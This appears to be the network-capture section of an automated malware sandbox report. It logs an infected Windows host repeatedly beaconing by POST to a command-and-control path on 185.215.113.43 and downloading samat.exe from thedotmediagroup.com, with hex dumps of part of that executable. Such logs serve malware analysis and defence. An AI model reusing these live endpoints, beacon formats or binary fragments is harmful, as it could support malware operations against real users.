Nov 21, 2024 22:19:29.517551899 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.5	50168	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:31.298717022 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:19:32.684037924 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.5	50169	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:34.413959980 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:19:35.790955067 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	50170	185.215.113.43	80	3952	C:\Windows\System32\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:37.436423063 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:19:38.838113070 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.5	50172	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:40.585402012 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:19:41.932939053 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.5	50173	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:43.572046995 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:19:44.999707937 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.5	50174	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:46.741942883 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:19:48.081738949 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.5	50175	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:49.709903955 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:19:51.091233015 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	50177	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:52.835971117 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:19:54.176927090 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.5	50180	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:19:58.959685087 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:20:00.313141108 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:20:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.5	50182	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:20:05.139697075 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:20:06.493705034 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:20:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.5	50183	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:20:08.132091999 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:20:09.536072016 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:20:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.5	50184	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:20:11.287513018 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:20:12.722920895 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:20:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	50185	185.215.113.43	80	6120	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:20:14.352327108 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:20:15.734050035 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:20:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49824	188.165.52.14	443	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:12:11 UTC	55	OUT	GET /samat.exe HTTP/1.1 Host: thedotmediagroup.com
2024-11-21 21:12:12 UTC	209	IN	HTTP/1.1 200 OK Connection: close content-type: application/x-msdownload last-modified: Thu, 21 Nov 2024 21:06:24 GMT accept-ranges: bytes content-length: 13960143 date: Thu, 21 Nov 2024 21:12:11 GMT
2024-11-21 21:12:12 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6e 3d 90 09 2a 5c fe 5a 2a 5c fe 5a 2a 5c fe 5a 61 24 fd 5b 2d 5c fe 5a 61 24 fb 5b 9e 5c fe 5a 61 24 fa 5b 20 5c fe 5a 3a d8 03 5a 29 5c fe 5a 3a d8 fd 5b 23 5c fe 5a 3a d8 fa 5b 3b 5c fe 5a 3a d8 fb 5b 02 5c fe 5a 61 24 ff 5b 21 5c fe 5a 2a 5c ff 5a b1 5c fe 5a 62 d9 fa 5b 33 5c fe 5a 62 d9 fc 5b 2b 5c fe 5a 52 69 63 68 2a 5c fe 5a 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$n=\Z\Z\Za$[-\Za$[\Za$[ \Z:Z)\Z:[#\Z:[;\Z:[\Za$[!\Z\Z\Zb[3\Zb[+\ZRich*\ZPEd
2024-11-21 21:12:12 UTC	16384	IN	Data Raw: 00 e9 22 03 01 00 ba b0 01 00 00 b9 01 00 00 00 e9 13 03 01 00 ba c8 01 00 00 b9 01 00 00 00 e9 04 03 01 00 33 c0 c3 90 d9 4b 00 00 24 4c 00 00 e8 4b 00 00 24 4c 00 00 f7 4b 00 00 24 4c 00 00 06 4c 00 00 24 4c 00 00 06 4c 00 00 24 4c 00 00 15 4c 00 00 15 4c 00 00 cc cc cc cc cc cc cc cc 48 85 c9 74 22 53 48 83 ec 20 48 8b 05 57 d1 03 00 48 8b d9 ff 15 36 68 02 00 48 8b cb e8 ae 02 01 00 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc 40 53 48 81 ec a0 00 00 00 48 8b 05 a0 93 03 00 48 33 c4 48 89 84 24 90 00 00 00 48 8b 05 d6 d1 03 00 48 8b d9 48 8d 4c 24 60 ff 15 f0 67 02 00 8b 43 14 48 8d 54 24 60 89 84 24 80 00 00 00 48 8d 4c 24 40 8b 43 18 89 84 24 84 00 00 00 48 8b 05 db d0 03 00 c7 44 24 70 01 00 00 00 ff 15 bd 67 02 00 48 8d 4c 24 20 0f 10 00 0f 10 48 10 Data Ascii: "3K$LK$LK$LL$LL$LLLHt"SH HWH6hHH [@SHHH3H$HHHL$`gCHT$`$HL$@C$HD$pgHL$ H
2024-11-21 21:12:12 UTC	16384	IN	Data Raw: 00 00 ff 15 68 25 02 00 85 c0 74 7c 0f 1f 40 00 83 f8 ff 75 06 ff 15 b5 24 02 00 44 38 b3 60 30 00 00 75 6d 48 8b 93 58 30 00 00 48 8d 4d 80 45 33 c9 89 74 24 20 45 33 c0 ff 15 b1 27 02 00 85 c0 7e 33 48 8d 4d 80 ff 15 b3 27 02 00 48 8d 4d 80 ff 15 a1 27 02 00 48 8b 93 58 30 00 00 48 8d 4d 80 45 33 c9 89 74 24 20 45 33 c0 ff 15 7e 27 02 00 85 c0 7f cd 48 8b 0f ba 64 00 00 00 ff 15 ec 24 02 00 85 c0 75 88 44 38 b3 60 30 00 00 74 41 48 8b 0f ba f4 01 00 00 ff 15 d1 24 02 00 85 c0 0f 84 51 01 00 00 48 8b 0f ba ff ff ff ff ff 15 d3 24 02 00 85 c0 75 06 ff 15 11 24 02 00 48 8b 0f ba ff ff ff ff ff 15 a3 24 02 00 e9 26 01 00 00 44 38 b3 61 30 00 00 0f 85 e1 00 00 00 48 8d 4c 24 78 ff 15 7e 24 02 00 48 8d 4c 24 70 ff 15 6b 24 02 00 66 66 66 0f 1f 84 00 00 00 00 Data Ascii: h%t\|@u$D8`0umHX0HME3t$ E3'~3HM'HM'HX0HME3t$ E3~'Hd$uD8`0tAH$QH$u$H$&D8a0HL$x~$HL$pk$fff
2024-11-21 21:12:12 UTC	16384	IN	Data Raw: e8 27 05 00 00 cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 e8 d3 04 00 00 33 c0 48 83 c4 28 c3 48 83 ec 28 e8 e3 06 00 00 e8 52 9f ff ff 8b c8 48 83 c4 28 e9 bb d1 00 00 cc cc cc 48 89 5c 24 08 57 48 83 ec 30 b9 01 00 00 00 e8 bc 01 00 00 84 c0 0f 84 30 01 00 00 40 32 ff 40 88 7c 24 20 e8 6b 01 00 00 8a d8 8b 0d 03 59 03 00 83 f9 01 0f 84 1d 01 00 00 85 c9 75 4a c7 05 ec 58 03 00 01 00 00 00 48 8d 15 a5 e8 01 00 48 8d 0d 5e e8 01 00 e8 85 cb 00 00 85 c0 74 0a b8 ff 00 00 00 e9 d8 00 00 00 48 8d 15 3c e8 01 00 48 8d 0d 25 e8 01 00 e8 20 cb 00 00 c7 05 ae 58 03 00 02 00 00 00 eb 08 40 b7 01 40 88 7c 24 20 8a cb e8 99 02 00 00 e8 3c 04 00 00 48 8b d8 48 83 38 00 74 1e 48 8b c8 e8 eb 01 00 00 84 c0 74 12 45 33 c0 41 8d 50 02 33 c9 48 8b 03 ff 15 b1 e7 01 00 Data Ascii: 'H(3H(H(RH(H\$WH00@2@\|$ kYuJXHH^tH<H% X@@\|$ <HH8tHtE3AP3H
2024-11-21 21:12:12 UTC	16384	IN	Data Raw: b7 01 48 89 b5 00 04 00 00 33 c9 e8 38 9d 00 00 40 8a c7 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 b8 ff ff ff ff ff ff ff 3f 48 8b e9 48 3b d0 76 11 41 c6 40 30 01 32 c0 41 c7 40 2c 0c 00 00 00 eb 60 33 ff 48 8d 34 95 00 00 00 00 48 39 b9 08 04 00 00 75 09 48 81 fe 00 04 00 00 76 09 48 3b b1 00 04 00 00 77 04 b0 01 eb 37 48 8b ce e8 6c c9 00 00 48 8b d8 48 85 c0 74 1d 48 8b 8d 08 04 00 00 e8 a4 9c 00 00 48 89 9d 08 04 00 00 40 b7 01 48 89 b5 00 04 00 00 33 c9 e8 8c 9c 00 00 40 8a c7 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 45 8b c8 41 83 e9 02 74 32 41 83 e9 01 74 29 41 83 f9 09 74 23 41 83 f8 0d 74 1d 83 e1 04 41 b8 ef ff 00 00 0f 95 c0 66 83 ea 63 Data Ascii: H38@H\$0Hl$8Ht$@H _H\$Hl$Ht$WH H?HH;vA@02A@,`3H4H9uHvH;w7HlHHtHH@H3@H\$0Hl$8Ht$@H _EAt2At)At#AtAfc
2024-11-21 21:12:12 UTC	16384	IN	Data Raw: 04 00 00 48 8b 85 70 04 00 00 45 33 e4 4c 89 64 24 50 49 8b d8 44 88 64 24 60 48 8b f2 44 88 64 24 78 4c 8b f9 44 88 65 80 44 88 65 88 48 85 c0 74 05 0f 10 00 eb 10 44 39 25 a6 dd 02 00 75 12 0f 10 05 f1 96 02 00 c6 44 24 78 01 f3 0f 7f 44 24 68 4d 85 c9 75 32 48 8d 44 24 50 c6 45 80 01 48 89 44 24 28 45 33 c9 45 33 c0 4c 89 64 24 20 33 d2 c7 44 24 7c 16 00 00 00 33 c9 e8 93 5b 00 00 83 cf ff e9 45 01 00 00 48 85 db 74 05 48 85 f6 74 c4 4d 8b f7 44 89 64 24 49 66 44 89 64 24 4d 44 88 64 24 4f 48 89 74 24 30 48 89 5c 24 38 4c 89 64 24 40 41 83 e6 02 75 0a 44 88 64 24 48 48 85 f6 75 05 c6 44 24 48 01 48 8d 44 24 50 44 89 65 b0 48 89 45 98 48 8d 4d 90 48 8d 44 24 30 44 88 65 b4 48 89 85 f0 03 00 00 0f 57 c0 48 8b 85 78 04 00 00 48 89 45 a8 4c 89 65 b8 44 89 Data Ascii: HpE3Ld$PIDd$`HDd$xLDeDeHtD9%uD$xD$hMu2HD$PEHD$(E3E3Ld$ 3D$\|3[EHtHtMDd$IfDd$MDd$OHt$0H\$8Ld$@AuDd$HHuD$HHD$PDeHEHMHD$0DeHWHxHELeD
2024-11-21 21:12:12 UTC	16384	IN	Data Raw: 48 83 ec 20 48 8b f2 8b f9 e8 ba 26 00 00 45 33 c9 48 8b d8 48 85 c0 74 1f 48 8b 08 48 8b c1 4c 8d 81 c0 00 00 00 49 3b c8 74 0d 39 38 74 20 48 83 c0 10 49 3b c0 75 f3 33 c0 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 85 c0 74 e4 4c 8b 40 08 4d 85 c0 74 db 49 83 f8 05 75 0a 4c 89 48 08 41 8d 40 fc eb cd 49 83 f8 01 75 05 83 c8 ff eb c2 48 8b 6b 08 48 89 73 08 83 78 04 08 0f 85 c4 00 00 00 48 83 c1 30 48 8d 91 90 00 00 00 eb 08 4c 89 49 08 48 83 c1 10 48 3b ca 75 f3 81 38 8d 00 00 c0 8b 7b 10 74 7a 81 38 8e 00 00 c0 74 6b 81 38 8f 00 00 c0 74 5c 81 38 90 00 00 c0 74 4d 81 38 91 00 00 c0 74 3e 81 38 92 00 00 c0 74 2f 81 38 93 00 00 c0 74 20 81 38 b4 02 00 c0 74 11 81 38 b5 02 00 c0 8b d7 75 40 ba 8d 00 00 00 eb 36 ba 8e 00 00 00 eb 2f Data Ascii: H H&E3HHtHHLI;t98t HI;u3H\$0Hl$8Ht$@H _HtL@MtIuLHA@IuHkHsxH0HLIHH;u8{tz8tk8t\8tM8t>8t/8t 8t8u@6/
2024-11-21 21:12:12 UTC	16384	IN	Data Raw: eb 08 ff 15 c8 e4 00 00 89 07 48 8b c7 48 8b 8c 24 40 14 00 00 48 33 cc e8 33 f9 fe ff 4c 8d 9c 24 50 14 00 00 49 8b 5b 20 49 8b 6b 30 49 8b e3 41 5e 5f 5e c3 cc cc cc 48 89 5c 24 08 48 89 6c 24 18 56 57 41 54 41 56 41 57 b8 70 14 00 00 e8 fc fb fe ff 48 2b e0 48 8b 05 e2 13 02 00 48 33 c4 48 89 84 24 60 14 00 00 4c 63 d2 48 8b d9 49 8b c2 45 8b f1 48 c1 f8 06 48 8d 0d b0 5d 02 00 41 83 e2 3f 4d 03 f0 4d 8b f8 49 8b f8 48 8b 04 c1 4b 8d 14 d2 4c 8b 64 d0 28 33 c0 48 89 03 4d 3b c6 89 43 08 0f 83 ce 00 00 00 48 8d 44 24 50 49 3b fe 73 2d 0f b7 0f 48 83 c7 02 66 83 f9 0a 75 0c ba 0d 00 00 00 66 89 10 48 83 c0 02 66 89 08 48 83 c0 02 48 8d 8c 24 f8 06 00 00 48 3b c1 72 ce 48 83 64 24 38 00 48 8d 4c 24 50 48 83 64 24 30 00 4c 8d 44 24 50 48 2b c1 c7 44 24 28 Data Ascii: HH$@H33L$PI[ Ik0IA^_^H\$Hl$VWATAVAWpH+HH3H$`LcHIEHH]A?MMIHKLd(3HM;CHD$PI;s-HfufHfHH$H;rHd$8HL$PHd$0LD$PH+D$(
2024-11-21 21:12:12 UTC	16384	IN	Data Raw: 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 45 33 c9 48 89 74 24 20 45 33 c0 33 d2 33 c9 e8 e1 9c ff ff cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 30 33 f6 8b ea 4c 8b f9 48 85 c9 75 10 e8 bb 42 ff ff c7 00 16 00 00 00 e9 f6 02 00 00 ba 3d 00 00 00 49 8b ff e8 6b c9 fe ff 4c 8b e8 48 85 c0 0f 84 ca 02 00 00 49 3b c7 0f 84 c1 02 00 00 4c 8b 35 37 1d 02 00 4c 3b 35 38 1d 02 00 44 0f b7 60 02 75 12 49 8b ce e8 d5 03 00 00 4c 8b f0 48 89 05 17 1d 02 00 bb 01 00 00 00 4d 85 f6 0f 85 cd 00 00 00 48 8b 05 fa 1c 02 00 85 ed 74 51 48 85 c0 74 4c e8 38 8a ff ff 48 85 c0 75 1e e8 3a 42 ff ff c7 00 16 00 00 00 48 83 cd ff 49 8b cf e8 68 9c ff ff 8b c5 e9 6b 02 00 00 4c 8b 35 ca 1c 02 00 4c 3b 35 cb 1c 02 00 75 7c 49 8b ce e8 6d 03 00 00 Data Ascii: _A^A]A\_^]E3Ht$ E333H\$Hl$Ht$WATAUAVAWH03LHuB=IkLHI;L57L;58D`uILHMHtQHtL8Hu:BHIhkL5L;5u\|Im
